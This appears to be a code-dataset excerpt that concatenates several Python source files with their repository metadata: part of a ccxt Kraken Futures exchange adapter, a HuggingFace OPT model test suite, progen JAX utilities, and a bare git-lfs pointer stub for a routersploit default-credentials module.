symbol = '' if (symbol is None) else symbol
raise BadRequest(self.id + ' fetchBalance has no account for ' + type)
balance = self.parse_balance(account)
return self.extend({
'info': response,
'timestamp': self.parse8601(datetime),
'datetime': datetime,
}, balance)
def parse_balance(self, response):
#
# cashAccount
#
# {
# balances: {
# eur: '0.0',
# gbp: '0.0',
# bch: '0.0',
# xrp: '2.20188538338',
# usd: '0.0',
# eth: '0.0',
# usdt: '0.0',
# ltc: '0.0',
# usdc: '0.0',
# xbt: '0.0'
# },
# type: 'cashAccount'
# }
#
# marginAccount e,g, fi_xrpusd
#
# {
# auxiliary: {
# usd: '0',
# pv: '11.0',
# pnl: '0.0',
# af: '11.0',
# funding: '0.0'
# },
# marginRequirements: {im: '0.0', mm: '0.0', lt: '0.0', tt: '0.0'},
# triggerEstimates: {im: '0', mm: '0', lt: '0', tt: '0'},
# balances: {xrp: '11.0'},
# currency: 'xrp',
# type: 'marginAccount'
# }
#
# flex/multiCollateralMarginAccount
#
# {
# currencies: {
# USDT: {
# quantity: '1',
# value: '1.0001',
# collateral: '0.9477197625',
# available: '1.0'
# }
# },
# initialMargin: '0.0',
# initialMarginWithOrders: '0.0',
# maintenanceMargin: '0.0',
# balanceValue: '1.0',
# portfolioValue: '1.0',
# collateralValue: '0.95',
# pnl: '0.0',
# unrealizedFunding: '0.0',
# totalUnrealized: '0.0',
# totalUnrealizedAsMargin: '0.0',
# availableMargin: '0.95',
# marginEquity: '0.95',
# type: 'multiCollateralMarginAccount'
# }
#
accountType = self.safe_string_2(response, 'accountType', 'type')
isFlex = (accountType == 'multiCollateralMarginAccount')
isCash = (accountType == 'cashAccount')
balances = self.safe_value_2(response, 'balances', 'currencies', {})
result = {}
currencyIds = list(balances.keys())
for i in range(0, len(currencyIds)):
currencyId = currencyIds[i]
balance = balances[currencyId]
code = self.safe_currency_code(currencyId)
splitCode = code.split('_')
codeLength = len(splitCode)
if codeLength > 1:
continue # Removes contract codes like PI_XRPUSD
account = self.account()
if isFlex:
account['total'] = self.safe_string(balance, 'quantity')
account['free'] = self.safe_string(balance, 'available')
elif isCash:
account['used'] = '0.0'
account['total'] = balance
else:
auxiliary = self.safe_value(response, 'auxiliary')
account['free'] = self.safe_string(auxiliary, 'af')
account['total'] = self.safe_string(auxiliary, 'pv')
result[code] = account
return self.safe_balance(result)
async def fetch_funding_rate_history(self, symbol: Optional[str] = None, since: Optional[int] = None, limit: Optional[int] = None, params={}):
self.check_required_symbol('fetchFundingRateHistory', symbol)
await self.load_markets()
market = self.market(symbol)
if not market['swap']:
raise BadRequest(self.id + ' fetchFundingRateHistory() supports swap contracts only')
request = {
'symbol': market['id'].upper(),
}
response = await self.publicGetHistoricalfundingrates(self.extend(request, params))
#
# {
# rates: [
# {
# timestamp: '2018-08-31T16:00:00.000Z',
# fundingRate: '2.18900669884E-7',
# relativeFundingRate: '0.000060779960000000'
# },
# ...
# ]
# }
#
rates = self.safe_value(response, 'rates')
result = []
for i in range(0, len(rates)):
item = rates[i]
datetime = self.safe_string(item, 'timestamp')
result.append({
'info': item,
'symbol': symbol,
'fundingRate': self.safe_number(item, 'fundingRate'),
'timestamp': self.parse8601(datetime),
'datetime': datetime,
})
sorted = self.sort_by(result, 'timestamp')
return self.filter_by_symbol_since_limit(sorted, symbol, since, limit)
async def fetch_positions(self, symbols: Optional[List[str]] = None, params={}):
"""
Fetches current contract trading positions
:param [str] symbols: List of unified symbols
:param dict params: Not used by krakenfutures
:returns: Parsed exchange response for positions
"""
await self.load_markets()
request = {}
response = await self.privateGetOpenpositions(request)
#
# {
# result: 'success',
# openPositions: [
# {
# side: 'long',
# symbol: 'pi_xrpusd',
# price: '0.7533',
# fillTime: '2022-03-03T22:51:16.566Z',
# size: '230',
# unrealizedFunding: '-0.001878596918214635'
# }
# ],
# serverTime: '2022-03-03T22:51:16.566Z'
# }
#
result = self.parse_positions(response)
return self.filter_by_array(result, 'symbol', symbols, False)
def parse_positions(self, response, symbols: Optional[List[str]] = None, params={}):
result = []
positions = self.safe_value(response, 'openPositions')
for i in range(0, len(positions)):
position = self.parse_position(positions[i])
result.append(position)
return result
def parse_position(self, position, market=None):
# cross
# {
# side: 'long',
# symbol: 'pi_xrpusd',
# price: '0.7533',
# fillTime: '2022-03-03T22:51:16.566Z',
# size: '230',
# unrealizedFunding: '-0.001878596918214635'
# }
#
# isolated
# {
# "side":"long",
# "symbol":"pf_ftmusd",
# "price":"0.4921",
# "fillTime":"2023-02-22T11:37:16.685Z",
# "size":"1",
# "unrealizedFunding":"-8.155240068885155E-8",
# "pnlCurrency":"USD",
# "maxFixedLeverage":"1.0"
# }
#
leverage = self.safe_number(position, 'maxFixedLeverage')
marginType = 'cross'
if leverage is not None:
marginType = 'isolated'
datetime = self.safe_string(position, 'fillTime')
marketId = self.safe_string(position, 'symbol')
market = self.safe_market(marketId, market)
return {
'info': position,
'symbol': market['symbol'],
'timestamp': self.parse8601(datetime),
'datetime': datetime,
'initialMargin': None,
'initialMarginPercentage': None,
'maintenanceMargin': None,
'maintenanceMarginPercentage': None,
'entryPrice': self.safe_number(position, 'price'),
'notional': None,
'leverage': leverage,
'unrealizedPnl': self.safe_number(position, 'unrealizedFunding'),
'contracts': self.safe_number(position, 'size'),
'contractSize': self.safe_number(market, 'contractSize'),
'marginRatio': None,
'liquidationPrice': None,
'markPrice': None,
'collateral': None,
'marginType': marginType,
'side': self.safe_string(position, 'side'),
'percentage': None,
}
async def fetch_leverage_tiers(self, symbols: Optional[List[str]] = None, params={}):
await self.load_markets()
response = await self.publicGetInstruments(params)
#
# {
# "result": "success",
# "instruments": [
# {
# "symbol": "fi_ethusd_180928",
# "type": "futures_inverse", # futures_vanilla # spot index
# "underlying": "rr_ethusd",
# "lastTradingTime": "2018-09-28T15:00:00.000Z",
# "tickSize": 0.1,
# "contractSize": 1,
# "tradeable": True,
# "marginLevels": [
# {
# "contracts":0,
# "initialMargin":0.02,
# "maintenanceMargin":0.01
# },
# {
# "contracts":250000,
# "initialMargin":0.04,
# "maintenanceMargin":0.02
# },
# ...
# ],
# "isin": "GB00JVMLMP88",
# "retailMarginLevels": [
# {
# "contracts": 0,
# "initialMargin": 0.5,
# "maintenanceMargin": 0.25
# }
# ],
# "tags": [],
# },
# {
# "symbol": "in_xbtusd",
# "type": "spot index",
# "tradeable":false
# }
# ]
# "serverTime": "2018-07-19T11:32:39.433Z"
# }
#
data = self.safe_value(response, 'instruments')
return self.parse_leverage_tiers(data, symbols, 'symbol')
def parse_market_leverage_tiers(self, info, market=None):
"""
* @ignore
* @param info Exchange market response for 1 market
* @param market CCXT market
"""
#
# {
# "symbol": "fi_ethusd_180928",
# "type": "futures_inverse", # futures_vanilla # spot index
# "underlying": "rr_ethusd",
# "lastTradingTime": "2018-09-28T15:00:00.000Z",
# "tickSize": 0.1,
# "contractSize": 1,
# "tradeable": True,
# "marginLevels": [
# {
# "contracts":0,
# "initialMargin":0.02,
# "maintenanceMargin":0.01
# },
# {
# "contracts":250000,
# "initialMargin":0.04,
# "maintenanceMargin":0.02
# },
# ...
# ],
# "isin": "GB00JVMLMP88",
# "retailMarginLevels": [
# {
# "contracts": 0,
# "initialMargin": 0.5,
# "maintenanceMargin": 0.25
# }
# ],
# "tags": [],
# }
#
marginLevels = self.safe_value(info, 'marginLevels')
id = self.safe_string(info, 'symbol')
market = self.safe_market(id, market)
tiers = []
for i in range(0, len(marginLevels)):
tier = marginLevels[i]
initialMargin = self.safe_string(tier, 'initialMargin')
notionalFloor = self.safe_number(tier, 'contracts')
if i != 0:
tiersLength = len(tiers)
previousTier = tiers[tiersLength - 1]
previousTier['notionalCap'] = notionalFloor
tiers.append({
'tier': self.sum(i, 1),
'currency': market['quote'],
'notionalFloor': notionalFloor,
'notionalCap': None,
'maintenanceMarginRate': self.safe_number(tier, 'maintenanceMargin'),
'maxLeverage': self.parse_number(Precise.string_div('1', initialMargin)),
'info': tier,
})
return tiers
def parse_transfer(self, transfer, currency=None):
#
# transfer
#
# {
# result: 'success',
# serverTime: '2022-04-12T01:22:53.420Z'
# }
#
datetime = self.safe_string(transfer, 'serverTime')
return {
'info': transfer,
'id': None,
'timestamp': self.parse8601(datetime),
'datetime': datetime,
'currency': self.safe_string(currency, 'code'),
'amount': None,
'fromAccount': None,
'toAccount': None,
'status': self.safe_string(transfer, 'result'),
}
def parse_account(self, account):
accountByType = {
'main': 'cash',
'funding': 'cash',
'future': 'cash',
'futures': 'cash',
'cashAccount': 'cash',
'multiCollateralMarginAccount': 'flex',
'multiCollateral': 'flex',
'multiCollateralMargin': 'flex',
}
if account in accountByType:
return accountByType[account]
elif account in self.markets:
market = self.market(account)
marketId = market['id']
splitId = marketId.split('_')
if market['inverse']:
return 'fi_' + self.safe_string(splitId, 1)
else:
return 'fv_' + self.safe_string(splitId, 1)
else:
return account
async def transfer_out(self, code: str, amount, params={}):
"""
transfer from futures wallet to spot wallet
:param str code: Unified currency code
:param float amount: Size of the transfer
:param dict params: Exchange specific parameters
:returns: a `transfer structure <https://docs.ccxt.com/#/?id=transfer-structure>`
"""
return await self.transfer(code, amount, 'future', 'spot', params)
async def transfer(self, code: str, amount, fromAccount, toAccount, params={}):
"""
transfers currencies between sub-accounts
:param str code: Unified currency code
:param float amount: Size of the transfer
:param str fromAccount: 'main'/'funding'/'future', 'flex', or a unified market symbol
:param str toAccount: 'main'/'funding', 'flex', 'spot' or a unified market symbol
:param dict params: Exchange specific parameters
:returns: a `transfer structure <https://docs.ccxt.com/#/?id=transfer-structure>`
"""
await self.load_markets()
currency = self.currency(code)
method = 'privatePostTransfer'
request = {
'amount': amount,
}
if fromAccount == 'spot':
raise BadRequest(self.id + ' transfer does not yet support transfers from spot')
if toAccount == 'spot':
if self.parse_account(fromAccount) != 'cash':
raise BadRequest(self.id + ' transfer cannot transfer from ' + fromAccount + ' to ' + toAccount)
method = 'privatePostWithdrawal'
request['currency'] = currency['id']
else:
request['fromAccount'] = self.parse_account(fromAccount)
request['toAccount'] = self.parse_account(toAccount)
request['unit'] = currency['id']
response = await getattr(self, method)(self.extend(request, params))
#
# {
# result: 'success',
# serverTime: '2022-04-12T01:22:53.420Z'
# }
#
transfer = self.parse_transfer(response, currency)
return self.extend(transfer, {
'amount': amount,
'fromAccount': fromAccount,
'toAccount': toAccount,
})
def handle_errors(self, code, reason, url, method, headers, body, response, requestHeaders, requestBody):
if response is None:
return None
if code == 429:
raise DDoSProtection(self.id + ' ' + body)
message = self.safe_string(response, 'error')
if message is None:
return None
feedback = self.id + ' ' + body
self.throw_exactly_matched_exception(self.exceptions['exact'], message, feedback)
self.throw_broadly_matched_exception(self.exceptions['broad'], message, feedback)
if code == 400:
raise BadRequest(feedback)
raise ExchangeError(feedback) # unknown message
def sign(self, path, api='public', method='GET', params={}, headers=None, body=None):
apiVersions = self.safe_value(self.options['versions'], api, {})
methodVersions = self.safe_value(apiVersions, method, {})
defaultVersion = self.safe_string(methodVersions, path, self.version)
version = self.safe_string(params, 'version', defaultVersion)
params = self.omit(params, 'version')
apiAccess = self.safe_value(self.options['access'], api, {})
methodAccess = self.safe_value(apiAccess, method, {})
access = self.safe_string(methodAccess, path, 'public')
endpoint = version + '/' + self.implode_params(path, params)
params = self.omit(params, self.extract_params(path))
query = endpoint
postData = ''
if params:
postData = self.urlencode(params)
query += '?' + postData
url = self.urls['api'][api] + query
if api == 'private' or access == 'private':
auth = postData + '/api/'
if api != 'private':
auth += api + '/'
auth += endpoint # 1
hash = self.hash(self.encode(auth), 'sha256', 'binary') # 2
secret = self.base64_to_binary(self.secret) # 3
signature = self.hmac(hash, secret, hashlib.sha512, 'base64') # 4-5
headers = {
'Content-Type': 'application/json',
'APIKey': self.apiKey,
'Authent': signature,
}
return {'url': url, 'method': method, 'body': body, 'headers': headers}
| [
"[email protected]"
] | |
67a9ace1630cd9600d67b37a04481a0c6a93d353 | e8a48749014f372633de65d79bfa26a3ad743d89 | /tests/models/opt/test_modeling_opt.py | 86fa8c2c4bb8c184ac808e53fbf5c9944ad54f22 | [
"Apache-2.0"
] | permissive | pvcastro/pytorch-pretrained-BERT | 183b7291972c8d8c66c995647df66c1fe439a763 | 49cd736a288a315d741e5c337790effa4c9fa689 | refs/heads/master | 2022-08-19T08:55:16.332585 | 2022-06-30T16:11:08 | 2022-06-30T16:11:08 | 168,367,637 | 1 | 0 | Apache-2.0 | 2019-01-30T15:39:42 | 2019-01-30T15:39:41 | null | UTF-8 | Python | false | false | 17,670 | py | # coding=utf-8
# Copyright 2021, The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Testing suite for the PyTorch OPT model. """
import copy
import tempfile
import unittest
import timeout_decorator # noqa
from transformers import OPTConfig, is_torch_available
from transformers.testing_utils import require_torch, require_torch_gpu, slow, torch_device
from ...generation.test_generation_utils import GenerationTesterMixin
from ...test_configuration_common import ConfigTester
from ...test_modeling_common import ModelTesterMixin, ids_tensor
if is_torch_available():
import torch
from transformers import GPT2Tokenizer, OPTForCausalLM, OPTModel
def prepare_opt_inputs_dict(
config,
input_ids,
decoder_input_ids=None,
attention_mask=None,
decoder_attention_mask=None,
head_mask=None,
decoder_head_mask=None,
):
if attention_mask is None:
attention_mask = input_ids.ne(config.pad_token_id)
return {
"input_ids": input_ids,
"attention_mask": attention_mask,
"head_mask": head_mask,
}
class OPTModelTester:
def __init__(
self,
parent,
batch_size=13,
seq_length=7,
is_training=True,
use_labels=False,
vocab_size=99,
hidden_size=16,
num_hidden_layers=5,
num_attention_heads=4,
intermediate_size=4,
hidden_act="gelu",
hidden_dropout_prob=0.1,
attention_probs_dropout_prob=0.1,
max_position_embeddings=20,
eos_token_id=2,
pad_token_id=1,
bos_token_id=0,
embed_dim=16,
word_embed_proj_dim=16,
):
self.parent = parent
self.batch_size = batch_size
self.seq_length = seq_length
self.is_training = is_training
self.use_labels = use_labels
self.vocab_size = vocab_size
self.hidden_size = hidden_size
self.num_hidden_layers = num_hidden_layers
self.num_attention_heads = num_attention_heads
self.intermediate_size = intermediate_size
self.hidden_act = hidden_act
self.hidden_dropout_prob = hidden_dropout_prob
self.attention_probs_dropout_prob = attention_probs_dropout_prob
self.max_position_embeddings = max_position_embeddings
self.eos_token_id = eos_token_id
self.pad_token_id = pad_token_id
self.bos_token_id = bos_token_id
self.embed_dim = embed_dim
self.word_embed_proj_dim = word_embed_proj_dim
self.is_encoder_decoder = False
def prepare_config_and_inputs(self):
input_ids = ids_tensor([self.batch_size, self.seq_length], self.vocab_size)
input_ids = ids_tensor([self.batch_size, self.seq_length], self.vocab_size).clamp(
3,
)
input_ids[:, -1] = self.eos_token_id # Eos Token
decoder_input_ids = ids_tensor([self.batch_size, self.seq_length], self.vocab_size)
config = self.get_config()
inputs_dict = prepare_opt_inputs_dict(config, input_ids, decoder_input_ids)
return config, inputs_dict
def get_config(self):
return OPTConfig(
vocab_size=self.vocab_size,
hidden_size=self.hidden_size,
num_hidden_layers=self.num_hidden_layers,
num_attention_heads=self.num_attention_heads,
ffn_dim=self.intermediate_size,
dropout=self.hidden_dropout_prob,
attention_dropout=self.attention_probs_dropout_prob,
max_position_embeddings=self.max_position_embeddings,
eos_token_id=self.eos_token_id,
bos_token_id=self.bos_token_id,
pad_token_id=self.pad_token_id,
embed_dim=self.embed_dim,
is_encoder_decoder=False,
word_embed_proj_dim=self.word_embed_proj_dim,
)
def get_pipeline_config(self):
config = self.get_config()
config.max_position_embeddings = 100
return config
def prepare_config_and_inputs_for_common(self):
config, inputs_dict = self.prepare_config_and_inputs()
return config, inputs_dict
def create_and_check_decoder_model_past_large_inputs(self, config, inputs_dict):
model = OPTModel(config=config).to(torch_device).eval()
input_ids = inputs_dict["input_ids"]
attention_mask = inputs_dict["attention_mask"]
head_mask = inputs_dict["head_mask"]
# first forward pass
outputs = model(input_ids, attention_mask=attention_mask, head_mask=head_mask, use_cache=True)
output, past_key_values = outputs.to_tuple()
# create hypothetical multiple next token and extent to next_input_ids
next_tokens = ids_tensor((self.batch_size, 3), config.vocab_size)
next_attn_mask = ids_tensor((self.batch_size, 3), 2)
# append to next input_ids and
next_input_ids = torch.cat([input_ids, next_tokens], dim=-1)
next_attention_mask = torch.cat([attention_mask, next_attn_mask], dim=-1)
output_from_no_past = model(next_input_ids, attention_mask=next_attention_mask)["last_hidden_state"]
output_from_past = model(next_tokens, attention_mask=next_attention_mask, past_key_values=past_key_values)[
"last_hidden_state"
]
# select random slice
random_slice_idx = ids_tensor((1,), output_from_past.shape[-1]).item()
output_from_no_past_slice = output_from_no_past[:, -3:, random_slice_idx].detach()
output_from_past_slice = output_from_past[:, :, random_slice_idx].detach()
self.parent.assertTrue(output_from_past_slice.shape[1] == next_tokens.shape[1])
# test that outputs are equal for slice
self.parent.assertTrue(torch.allclose(output_from_past_slice, output_from_no_past_slice, atol=1e-3))
@require_torch
class OPTModelTest(ModelTesterMixin, GenerationTesterMixin, unittest.TestCase):
all_model_classes = (OPTModel, OPTForCausalLM) if is_torch_available() else ()
all_generative_model_classes = (OPTForCausalLM,) if is_torch_available() else ()
is_encoder_decoder = False
fx_compatible = True
test_pruning = False
test_missing_keys = False
def setUp(self):
self.model_tester = OPTModelTester(self)
self.config_tester = ConfigTester(self, config_class=OPTConfig)
def test_config(self):
self.config_tester.run_common_tests()
def test_save_load_strict(self):
config, inputs_dict = self.model_tester.prepare_config_and_inputs()
for model_class in self.all_model_classes:
model = model_class(config)
with tempfile.TemporaryDirectory() as tmpdirname:
model.save_pretrained(tmpdirname)
model2, info = model_class.from_pretrained(tmpdirname, output_loading_info=True)
self.assertEqual(info["missing_keys"], [])
def test_decoder_model_past_with_large_inputs(self):
config_and_inputs = self.model_tester.prepare_config_and_inputs()
self.model_tester.create_and_check_decoder_model_past_large_inputs(*config_and_inputs)
def test_inputs_embeds(self):
config, inputs_dict = self.model_tester.prepare_config_and_inputs_for_common()
for model_class in (OPTModel,):
model = model_class(config)
model.to(torch_device)
model.eval()
inputs = copy.deepcopy(self._prepare_for_class(inputs_dict, model_class))
if not self.is_encoder_decoder:
input_ids = inputs["input_ids"]
del inputs["input_ids"]
else:
encoder_input_ids = inputs["input_ids"]
decoder_input_ids = inputs.get("decoder_input_ids", encoder_input_ids)
del inputs["input_ids"]
inputs.pop("decoder_input_ids", None)
wte = model.get_input_embeddings()
if not self.is_encoder_decoder:
inputs["inputs_embeds"] = wte(input_ids)
else:
inputs["inputs_embeds"] = wte(encoder_input_ids)
inputs["decoder_inputs_embeds"] = wte(decoder_input_ids)
with torch.no_grad():
model(**inputs)[0]
def test_generate_fp16(self):
config, input_dict = self.model_tester.prepare_config_and_inputs()
input_ids = input_dict["input_ids"]
attention_mask = input_ids.ne(1).to(torch_device)
model = OPTForCausalLM(config).eval().to(torch_device)
if torch_device == "cuda":
model.half()
model.generate(input_ids, attention_mask=attention_mask)
model.generate(num_beams=4, do_sample=True, early_stopping=False, num_return_sequences=3)
def assert_tensors_close(a, b, atol=1e-12, prefix=""):
"""If tensors have different shapes, different values or a and b are not both tensors, raise a nice Assertion error."""
if a is None and b is None:
return True
try:
if torch.allclose(a, b, atol=atol):
return True
raise
except Exception:
pct_different = (torch.gt((a - b).abs(), atol)).float().mean().item()
if a.numel() > 100:
msg = f"tensor values are {pct_different:.1%} percent different."
else:
msg = f"{a} != {b}"
if prefix:
msg = prefix + ": " + msg
raise AssertionError(msg)
def _long_tensor(tok_lst):
return torch.tensor(tok_lst, dtype=torch.long, device=torch_device)
@require_torch
class OPTModelIntegrationTests(unittest.TestCase):
@slow
def test_inference_no_head(self):
model = OPTModel.from_pretrained("facebook/opt-350m").to(torch_device)
input_ids = _long_tensor([[0, 31414, 232, 328, 740, 1140, 12695, 69, 46078, 1588, 2]])
with torch.no_grad():
output = model(input_ids=input_ids).last_hidden_state
expected_shape = torch.Size((1, 11, 512))
self.assertEqual(output.shape, expected_shape)
# expected value works for CPU, as well as GPU (with TF32 disabled)
expected_slice = torch.tensor(
[
[-0.28726277, -1.9241608, -0.3058734],
[-1.2737825, -0.13332152, -0.18766522],
[0.41159445, 0.1191957, -1.3107123],
],
device=torch_device,
)
assert_tensors_close(output[0, :3, :3], expected_slice, atol=5e-5)
@require_torch
@slow
class OPTEmbeddingsTest(unittest.TestCase):
def setUp(self):
super().setUp()
self.path_model = "facebook/opt-350m"
def test_load_model(self):
try:
_ = OPTForCausalLM.from_pretrained(self.path_model)
except BaseException:
self.fail("Failed loading model")
def test_logits(self):
model = OPTForCausalLM.from_pretrained(self.path_model)
model = model.eval()
tokenizer = GPT2Tokenizer.from_pretrained(self.path_model)
prompts = [
"Today is a beautiful day and I want to",
"In the city of",
"Paris is the capital of France and",
"Computers and mobile phones have taken",
]
# verify that prompt without BOS token is identical to Metaseq -> add_special_tokens=False
inputs = tokenizer(prompts, return_tensors="pt", padding=True, add_special_tokens=False)
logits = model(inputs.input_ids, attention_mask=inputs.attention_mask)[0].mean(dim=-1)
# logits_meta = torch.load(self.path_logits_meta)
logits_meta = torch.Tensor(
[
[1.3851, -13.8923, -10.5229, -10.7533, -0.2309, -10.2384, -0.5365, -9.0947, -5.1670],
[-4.7073, -10.6276, -3.9415, -21.5242, -0.2822, -0.2822, -0.2822, -0.2822, -0.2822],
[0.6247, -3.4229, -8.9179, -1.4297, -14.1650, 1.4146, -9.0218, -0.2703, -0.2703],
[6.4783, -1.9913, -10.7926, -2.3336, 1.5092, -0.9974, -6.8213, 1.3477, 1.3477],
]
)
assert torch.allclose(logits, logits_meta, atol=1e-4)
@slow
class OPTGenerationTest(unittest.TestCase):
@property
def prompts(self):
return [
"Today is a beautiful day and I want",
"In the city of",
"Paris is the capital of France and",
"Computers and mobile phones have taken",
]
def test_generation_pre_attn_layer_norm(self):
model_id = "facebook/opt-125m"
EXPECTED_OUTPUTS = [
"Today is a beautiful day and I want to",
"In the city of New York, the city",
"Paris is the capital of France and the capital",
"Computers and mobile phones have taken over the",
]
predicted_outputs = []
tokenizer = GPT2Tokenizer.from_pretrained(model_id)
model = OPTForCausalLM.from_pretrained(model_id)
for prompt in self.prompts:
input_ids = tokenizer(prompt, return_tensors="pt").input_ids
generated_ids = model.generate(input_ids, max_length=10)
generated_string = tokenizer.batch_decode(generated_ids, skip_special_tokens=True)
predicted_outputs += generated_string
self.assertListEqual(predicted_outputs, EXPECTED_OUTPUTS)
def test_batch_generation(self):
model_id = "facebook/opt-350m"
tokenizer = GPT2Tokenizer.from_pretrained(model_id)
model = OPTForCausalLM.from_pretrained(model_id)
model.to(torch_device)
tokenizer.padding_side = "left"
# use different length sentences to test batching
sentences = [
"Hello, my dog is a little",
"Today, I",
]
inputs = tokenizer(sentences, return_tensors="pt", padding=True)
input_ids = inputs["input_ids"].to(torch_device)
outputs = model.generate(
input_ids=input_ids,
attention_mask=inputs["attention_mask"].to(torch_device),
)
inputs_non_padded = tokenizer(sentences[0], return_tensors="pt").input_ids.to(torch_device)
output_non_padded = model.generate(input_ids=inputs_non_padded)
num_paddings = inputs_non_padded.shape[-1] - inputs["attention_mask"][-1].long().sum().cpu().item()
inputs_padded = tokenizer(sentences[1], return_tensors="pt").input_ids.to(torch_device)
output_padded = model.generate(input_ids=inputs_padded, max_length=model.config.max_length - num_paddings)
batch_out_sentence = tokenizer.batch_decode(outputs, skip_special_tokens=True)
non_padded_sentence = tokenizer.decode(output_non_padded[0], skip_special_tokens=True)
padded_sentence = tokenizer.decode(output_padded[0], skip_special_tokens=True)
expected_output_sentence = [
"Hello, my dog is a little bit of a dork.\nI'm a little bit",
"Today, I was in the middle of a conversation with a friend about the",
]
self.assertListEqual(expected_output_sentence, batch_out_sentence)
self.assertListEqual(batch_out_sentence, [non_padded_sentence, padded_sentence])
def test_generation_post_attn_layer_norm(self):
model_id = "facebook/opt-350m"
EXPECTED_OUTPUTS = [
"Today is a beautiful day and I want to",
"In the city of San Francisco, the city",
"Paris is the capital of France and the capital",
"Computers and mobile phones have taken over the",
]
predicted_outputs = []
tokenizer = GPT2Tokenizer.from_pretrained(model_id)
model = OPTForCausalLM.from_pretrained(model_id)
for prompt in self.prompts:
input_ids = tokenizer(prompt, return_tensors="pt").input_ids
generated_ids = model.generate(input_ids, max_length=10)
generated_string = tokenizer.batch_decode(generated_ids, skip_special_tokens=True)
predicted_outputs += generated_string
self.assertListEqual(predicted_outputs, EXPECTED_OUTPUTS)
@require_torch_gpu
def test_batched_nan_fp16(self):
# a bug manifested starting at models facebook/opt-1.3 and larger when running batched generations,
# therefore not using a tiny model, but the smallest model the problem was seen with which is opt-1.3b.
# please refer to this github thread: https://github.com/huggingface/transformers/pull/17437 for more details
model_name = "facebook/opt-1.3b"
tokenizer = GPT2Tokenizer.from_pretrained(model_name, use_fast=False, padding_side="left")
model = OPTForCausalLM.from_pretrained(model_name, torch_dtype=torch.float16, use_cache=True).cuda()
model = model.eval()
batch = tokenizer(["Who are you?", "Joe Biden is the president of"], padding=True, return_tensors="pt")
input_ids = batch["input_ids"].cuda()
attention_mask = batch["attention_mask"].cuda()
with torch.no_grad():
outputs = model(input_ids, attention_mask=attention_mask)
self.assertFalse(
torch.isnan(outputs.logits[0]).any().item()
) # the first logits could contain NaNs if it fails
| [
"[email protected]"
] | |
a753eac93c08765a0bdfa2dc047e3540b4c795b6 | d7a73fdc2fa60a171d1b3ed3bbefe863c9351fab | /progen_transformer/utils.py | 985f3b5fa667b37073c055c4d1b1786ddb90b702 | [
"MIT"
] | permissive | sailfish009/progen | e584d7352d8f89c7d72992c222ca888db7f28495 | 131320c67ed831aa812e58a4995d3414e458640f | refs/heads/main | 2023-06-07T12:49:09.742045 | 2021-07-04T00:06:59 | 2021-07-04T00:06:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,477 | py | import os, errno
from shutil import rmtree
from jax import random, nn, value_and_grad, vmap, pmap, jit, lax
from jax.lax import top_k
import jax.numpy as np
# helper functions
def exists(val):
return val is not None
def log(t, eps = 1e-20):
return np.log(t + eps)
def confirm(question):
while True:
resp = input(f'{question} (y/n) ')
lower_resp = resp.lower()
if lower_resp in ('y', 'n'):
return lower_resp == 'y'
def clear_directory_(path):
rmtree(str(path), ignore_errors = True)
path.mkdir(exist_ok = True, parents = True)
def silentremove(filename):
try:
os.remove(filename)
except OSError:
pass
# training functions
def cross_entropy(logits, targets, axis = -1, ignore_index = 0):
logprobs = nn.log_softmax(logits, axis = axis)
nll = np.take_along_axis(logprobs, np.expand_dims(targets, axis = axis), axis = axis)
# mask for loss is engineered so that it learns from the first padding token
# the padding token is reused as end-of-string for simplicity
mask = (targets != ignore_index)
eos_mask = (~mask).cumsum(axis = -1) == 1
mask = mask | eos_mask
ce = -np.mean(nll[mask])
return ce
def get_train_loss_fn(model, data_parallel = False):
map_fn = pmap if data_parallel else vmap
batch_model_apply = jit(map_fn(model.apply, in_axes = (None, None, 0), out_axes = 0))
@value_and_grad
def loss_fn(params, key, data):
inp, labels = data[:, :-1], data[:, 1:]
logits = batch_model_apply(params, key, inp)
return cross_entropy(logits, labels, axis = -1)
return loss_fn
# sampling functions
def select_top_k(tensor, k):
values, _ = top_k(tensor, k)
mask = tensor > values.min()
return mask, np.where(mask, tensor, 0.)
def gumbel_noise(rng, shape):
noise = random.uniform(rng, shape = shape, minval = 0., maxval = 1.)
return -log(-log(noise))
def sample(rng, fn, params, prime, length, top_k = None, add_bos = False):
start_pos = prime.shape[-1]
pad_right = length - prime.shape[-1]
padding = (0, pad_right) if not add_bos else (1, pad_right - 1)
seq = np.pad(prime, padding)
one_hots = np.eye(length, dtype = int)
for curr_pos in range(start_pos, length):
logits = fn(params, next(rng), seq)
logits = logits[curr_pos - 1]
noise = gumbel_noise(next(rng), logits.shape)
if exists(top_k):
mask, logits = select_top_k(logits, top_k)
noise *= mask
logits += noise
sampled_ind = np.argmax(logits, axis = -1)
one_hot = one_hots[curr_pos]
seq += one_hot * sampled_ind
# for now, just set everything after second padding token (eos) to padding
remove_after_eos_mask = (seq == 0).cumsum(axis = -1) > 1
seq *= ~remove_after_eos_mask
return seq
# rng hacks
def hardware_uniform(
rng_key,
shape,
dtype = np.float32,
minval = np.float32(0),
maxval = np.float32(1)
):
del rng_key
minval = lax.convert_element_type(minval, dtype)
maxval = lax.convert_element_type(maxval, dtype)
return lax.rng_uniform(minval, maxval, shape)
def hardware_bernoulli(rng_key, p = np.float32(0.5), shape = None):
del rng_key
return lax.rng_uniform(0.0, 1.0, shape) < p
def set_hardware_rng_(jax):
jax.random.bernoulli = hardware_bernoulli
jax.random.uniform = hardware_uniform
jax._src.random.uniform = hardware_uniform
| [
"[email protected]"
] | |
09f225cdf22472b45c1d1f9d140bd0d5ee2c897f | 55c250525bd7198ac905b1f2f86d16a44f73e03a | /Python/Scripts/Lazymux/routersploit/routersploit/modules/creds/cameras/honeywell/ssh_default_creds.py | 6477710e7ac7b6aa711f719e0a907bb616b6175d | [] | no_license | NateWeiler/Resources | 213d18ba86f7cc9d845741b8571b9e2c2c6be916 | bd4a8a82a3e83a381c97d19e5df42cbababfc66c | refs/heads/master | 2023-09-03T17:50:31.937137 | 2023-08-28T23:50:57 | 2023-08-28T23:50:57 | 267,368,545 | 2 | 1 | null | 2022-09-08T15:20:18 | 2020-05-27T16:18:17 | null | UTF-8 | Python | false | false | 128 | py | version https://git-lfs.github.com/spec/v1
